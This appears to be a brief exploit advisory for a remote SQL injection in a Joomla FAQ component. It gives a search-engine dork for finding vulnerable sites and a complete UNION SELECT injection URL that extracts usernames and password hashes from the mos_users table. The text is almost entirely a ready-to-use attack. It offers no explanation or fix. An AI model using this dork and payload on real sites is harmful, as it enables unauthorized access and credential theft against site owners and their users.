The Joomla FAQ component suffers from a remote SQL injection vulnerability.
7177477376093c8b70858bbbe8f3a31c1b425f43c49606b089006cb570ff9e6c
allinurl :"index.php?option=faq task"
index.php?option=faq&task=viewallfaq&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password),0x3a,0/**/from/**/mos_users/*